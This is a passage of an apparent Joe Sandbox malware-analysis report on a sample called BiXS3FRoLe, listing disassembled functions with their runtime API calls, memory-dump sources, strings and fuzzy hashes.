                                                                                                        • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 00B12997
                                                                                                        • Concurrency::location::_Assign.LIBCMT ref: 00B129CB
                                                                                                        • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00B129D3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
                                                                                                        • String ID:
                                                                                                        • API String ID: 1924466884-0
                                                                                                        • Opcode ID: 27b57c9cba30bc055180fade22144cccbbb6e18ea3bd47566512e118c4ff62d7
                                                                                                        • Instruction ID: e54647bdb6a9f1e5a1d1d0033656712cdd7fd3574ccd16e45e307bea9ec05668
                                                                                                        • Opcode Fuzzy Hash: 27b57c9cba30bc055180fade22144cccbbb6e18ea3bd47566512e118c4ff62d7
                                                                                                        • Instruction Fuzzy Hash: BA412B35A002189FCB05DF68C495BADBBF5FF48350F5480A9ED499B382DB30AA41CF91
                                                                                                        Function 00B0D5F0 Relevance: 10.6, APIs: 7, Instructions: 82threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 00B0D5F7
                                                                                                          • Part of subcall function 00AE9401: mtx_do_lock.LIBCPMT ref: 00AE9409
                                                                                                        • Concurrency::details::_CancellationTokenState::TokenRegistrationContainer::remove.LIBCONCRT ref: 00B0D629
                                                                                                        • Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 00B0D635
                                                                                                        • __Mtx_unlock.LIBCPMT ref: 00B0D648
                                                                                                        • atomic_compare_exchange.LIBCONCRT ref: 00B0D664
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00B0D67E
                                                                                                        • __Mtx_unlock.LIBCPMT ref: 00B0D6BF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::_Mtx_unlockToken$CancellationContainer::removeCounter::_CurrentH_prolog3RegistrationReleaseState::Threadatomic_compare_exchangemtx_do_lock
                                                                                                        • String ID:
                                                                                                        • API String ID: 3750600146-0
                                                                                                        • Opcode ID: bb4e40d9c8e2d5472a02591f9ce265f82719922acc3fc2d13ab4fb78d7158e79
                                                                                                        • Instruction ID: bee110d636d216767ac754bca25f244a5e56e35e88d0bee47be05e400ddc57fe
                                                                                                        • Opcode Fuzzy Hash: bb4e40d9c8e2d5472a02591f9ce265f82719922acc3fc2d13ab4fb78d7158e79
                                                                                                        • Instruction Fuzzy Hash: 1621E572C00255AADB31BBA8C943BEEBFE4AF01350F148086F508AB0D2CB755A45C7E1
                                                                                                        Function 00B41F96 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: eb85b246a8c90f72b66f4694b1c68d3f1379aa7a7b62db0a58a119084491193c
                                                                                                        • Instruction ID: 61db54445b0c38c4e71cf8ad69d92afb385a0044319fcb2ba1f44f7580e4a62d
                                                                                                        • Opcode Fuzzy Hash: eb85b246a8c90f72b66f4694b1c68d3f1379aa7a7b62db0a58a119084491193c
                                                                                                        • Instruction Fuzzy Hash: 0311B472504224BBDB30AFB69C45E6BBBECEB81771B2045D5F815D7390EA34CA41E6A0
                                                                                                        Function 00B18EEB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • FindSITargetTypeInstance.LIBVCRUNTIME ref: 00B18F3E
                                                                                                        • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00B18F57
                                                                                                        • PMDtoOffset.LIBCMT ref: 00B18F7D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FindInstanceTargetType$Offset
                                                                                                        • String ID: Bad dynamic_cast!
                                                                                                        • API String ID: 1467055271-2956939130
                                                                                                        • Opcode ID: 0f0e288b28e44880b96b8f2a369b59049bdccfb5fa6156a83f469463e3849cfb
                                                                                                        • Instruction ID: 3e4a90045955eb0b33c0a13966bd1af831408052a48a2685ae84161f01004d8d
                                                                                                        • Opcode Fuzzy Hash: 0f0e288b28e44880b96b8f2a369b59049bdccfb5fa6156a83f469463e3849cfb
                                                                                                        • Instruction Fuzzy Hash: 82212672A042059FCF14DF64CD46AEE77F5FB84720F608ADAE91097190DF31E94287A0
                                                                                                        Function 00AF1858 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Mpunct$GetcvtGetvalsH_prolog3
                                                                                                        • String ID: $+xv
                                                                                                        • API String ID: 2737107202-1686923651
                                                                                                        • Opcode ID: 9bde3c34dbba2e33e1b08d30bda8ee28c8455b7d56d8c57530be3bc6e31c154c
                                                                                                        • Instruction ID: f7b1c993abdf6d827a5a8a8403c26279be71e1473346f38521672527cc9d5421
                                                                                                        • Opcode Fuzzy Hash: 9bde3c34dbba2e33e1b08d30bda8ee28c8455b7d56d8c57530be3bc6e31c154c
                                                                                                        • Instruction Fuzzy Hash: 282181B1904B56AED725DFB5889077BBEF8AB0D300F04095AF599C7A41D734EA01CBD0
                                                                                                        Function 00B3D883 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00B3D5CA: _free.LIBCMT ref: 00B3D5F3
                                                                                                        • _free.LIBCMT ref: 00B3D8D1
                                                                                                          • Part of subcall function 00B34D66: RtlFreeHeap.NTDLL(00000000,00000000,?,00B3D5F8,?,00000000,?,00000000,?,00B3D89C,?,00000007,?,?,00B3DC90,?), ref: 00B34D7C
                                                                                                          • Part of subcall function 00B34D66: GetLastError.KERNEL32(?,?,00B3D5F8,?,00000000,?,00000000,?,00B3D89C,?,00000007,?,?,00B3DC90,?,?), ref: 00B34D8E
                                                                                                        • _free.LIBCMT ref: 00B3D8DC
                                                                                                        • _free.LIBCMT ref: 00B3D8E7
                                                                                                        • _free.LIBCMT ref: 00B3D93B
                                                                                                        • _free.LIBCMT ref: 00B3D946
                                                                                                        • _free.LIBCMT ref: 00B3D951
                                                                                                        • _free.LIBCMT ref: 00B3D95C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 776569668-0
                                                                                                        • Opcode ID: 22921c570f347c51b9b4154478a89f307a5e2a38109eaa47c22bc11f20e7934a
                                                                                                        • Instruction ID: 56ac26888025f8ae1350f6b8d2eb67e6e685122273e709e20d2e7c73228ecd45
                                                                                                        • Opcode Fuzzy Hash: 22921c570f347c51b9b4154478a89f307a5e2a38109eaa47c22bc11f20e7934a
                                                                                                        • Instruction Fuzzy Hash: F2112E72940B04BAD630FBB0DC0BFCB7BDCBF55704F914865B69AA7062DB69BA048750
                                                                                                        Function 00B0D843 Relevance: 10.6, APIs: 7, Instructions: 51threadCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 00B0D84A
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00B0D851
                                                                                                        • atomic_compare_exchange.LIBCONCRT ref: 00B0D85F
                                                                                                        • atomic_compare_exchange.LIBCONCRT ref: 00B0D883
                                                                                                          • Part of subcall function 00AE9401: mtx_do_lock.LIBCPMT ref: 00AE9409
                                                                                                        • __Mtx_unlock.LIBCPMT ref: 00B0D8A8
                                                                                                        • __Cnd_broadcast.LIBCPMT ref: 00B0D8BE
                                                                                                        • Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 00B0D8D2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_CurrentH_prolog3Mtx_unlockReleaseThreadmtx_do_lock
                                                                                                        • String ID:
                                                                                                        • API String ID: 420504553-0
                                                                                                        • Opcode ID: cdc659a1b1858a44045f9b91fcba766ca939c1acc56e941287f98c19c8a7c867
                                                                                                        • Instruction ID: 533ee5e5f4675777b2dab59458179e6b0cd286bf88582b7c310c513ff7a61e35
                                                                                                        • Opcode Fuzzy Hash: cdc659a1b1858a44045f9b91fcba766ca939c1acc56e941287f98c19c8a7c867
                                                                                                        • Instruction Fuzzy Hash: 4B01B1B1D00304A7DB10B7B88D47B9E7BEDAF58311F408581F904A72C2DBB8DB1586A1
                                                                                                        Function 00B027AE Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00B01F19,?,?,?,00000000), ref: 00B027BC
                                                                                                        • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00B01F19,?,?,?,00000000), ref: 00B027C2
                                                                                                        • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00B01F19,?,?,?,00000000), ref: 00B027EF
                                                                                                        • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00B01F19,?,?,?,00000000), ref: 00B027F9
                                                                                                        • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00B01F19,?,?,?,00000000), ref: 00B0280B
                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00B02821
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00B0282F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                        • String ID:
                                                                                                        • API String ID: 4227777306-0
                                                                                                        • Opcode ID: d2f935b07a746cdc240b26b0cfb31724c54d409dadb6e4dc2ee7bd667ba8560d
                                                                                                        • Instruction ID: 78e45109ecf7986df26d42c1f15f222f665b8cd112eb645f38c09fd20dd85446
                                                                                                        • Opcode Fuzzy Hash: d2f935b07a746cdc240b26b0cfb31724c54d409dadb6e4dc2ee7bd667ba8560d
                                                                                                        • Instruction Fuzzy Hash: 0501DF39600305A7CB24AB65DC4EBEB7BECEF40791B5084E5F505E21F0DF24E9088BA4
                                                                                                        Function 00AE1670 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 439COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00AE1997
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throw
                                                                                                        • String ID: Max$Min$RandomNumberType$invalid bit length
                                                                                                        • API String ID: 2005118841-2498579642
                                                                                                        • Opcode ID: fad9b1edbdb2f6574ae63cd37aa36975e72ec1cef80815f24264c3ce292d1911
                                                                                                        • Instruction ID: b8de3c6f936867c3d57f2da3b59b8aa05cf057c5404830b4bfd4cfc5f082db82
                                                                                                        • Opcode Fuzzy Hash: fad9b1edbdb2f6574ae63cd37aa36975e72ec1cef80815f24264c3ce292d1911
                                                                                                        • Instruction Fuzzy Hash: 09027371901248DFDF04DFA8C945BDEBBF9BF58304F548169E806A7242D7759A04CBA1
                                                                                                        Function 00B2E1DC Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __freea$__alloca_probe_16
                                                                                                        • String ID: a/p$am/pm
                                                                                                        • API String ID: 3509577899-3206640213
                                                                                                        • Opcode ID: ae1a7c1b72695678b079a989788687839eef2af580d3ef370a807017e37bb7ef
                                                                                                        • Instruction ID: 26c944dd2f0c661a42e77cd4da609d6d523b05f5dfc9d23e609da4ee7063f06a
                                                                                                        • Opcode Fuzzy Hash: ae1a7c1b72695678b079a989788687839eef2af580d3ef370a807017e37bb7ef
                                                                                                        • Instruction Fuzzy Hash: 55D12631910236CADB259F6AE9957BEB7F0FF25300F2441DAE929AB250E335DD40CB61
                                                                                                        Function 00AA8DC0 Relevance: 9.1, APIs: 6, Instructions: 123COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AA8E09
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AA8E2B
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AA8E4B
                                                                                                        • __Getctype.LIBCPMT ref: 00AA8EE1
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00AA8F00
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AA8F18
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                                                                        • String ID:
                                                                                                        • API String ID: 1102183713-0
                                                                                                        • Opcode ID: 118f31e01e045370d904705e42998e553182cb5ef657ecba9cf695b5dc3f2976
                                                                                                        • Instruction ID: 68b70abbdf83548c562533ab05f02a46dfe73b8d7840eaa7f56cf09febb3f571
                                                                                                        • Opcode Fuzzy Hash: 118f31e01e045370d904705e42998e553182cb5ef657ecba9cf695b5dc3f2976
                                                                                                        • Instruction Fuzzy Hash: EC41AD71D00605CFDB20DF54D981BAEB7B4EB15710F14816AE806AB391EF35AD05CBD1
                                                                                                        Function 00B129FB Relevance: 9.1, APIs: 6, Instructions: 117COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Concurrency::location::_Assign.LIBCMT ref: 00B12A3C
                                                                                                        • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00B12A44
                                                                                                        • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00B12A6E
                                                                                                        • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 00B12A77
                                                                                                        • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00B12AFA
                                                                                                        • Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00B12B02
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::Context$Base::$GroupInternalScheduleSegment$AssignAvailableConcurrency::location::_DeferredEventMakeProcessor::ReleaseRunnableSchedulerTraceVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 3929269971-0
                                                                                                        • Opcode ID: bdfde18c8c83dba69a140293812c9401fceae78d13ddd11f26e46f8483390535
                                                                                                        • Instruction ID: 0ab483727a3d10361d97800b152e6492901c405f0f1108bb0591c8e14f060e38
                                                                                                        • Opcode Fuzzy Hash: bdfde18c8c83dba69a140293812c9401fceae78d13ddd11f26e46f8483390535
                                                                                                        • Instruction Fuzzy Hash: EE417035A00619AFCB09DF64C494BADBBF5FF48710F448199E806AB391CB30AE51CF80
                                                                                                        Function 00A75240 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 85memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,AE695AF0,00000000), ref: 00A752A8
                                                                                                        • HeapFree.KERNEL32(00000000,?,AE695AF0,00000000), ref: 00A752AF
                                                                                                        • CloseHandle.KERNEL32(?,AE695AF0,774C6230,?,AE695AF0,00000000,00000000,00000000), ref: 00A752D9
                                                                                                        • CloseHandle.KERNEL32(?,?,AE695AF0,00000000,00000000,00000000), ref: 00A752DE
                                                                                                        • CloseHandle.KERNEL32(?,?,AE695AF0,00000000,00000000,00000000), ref: 00A752E3
                                                                                                          • Part of subcall function 00AFF480: GetProcessHeap.KERNEL32(00000000,?,?,AE695AF0,00B4E060,000000FF,?,00A7528A,AE695AF0,774C6230), ref: 00AFF4CB
                                                                                                          • Part of subcall function 00AFF480: HeapFree.KERNEL32(00000000,?,?,AE695AF0,00B4E060,000000FF,?,00A7528A,AE695AF0,774C6230), ref: 00AFF4D2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Heap$CloseHandle$FreeProcess
                                                                                                        • String ID: 0bLw
                                                                                                        • API String ID: 3876841697-143776869
                                                                                                        • Opcode ID: d84b568e78ac1d42b6a33eb0afa041990ad0e2210ee2fb8a36e068febd5da300
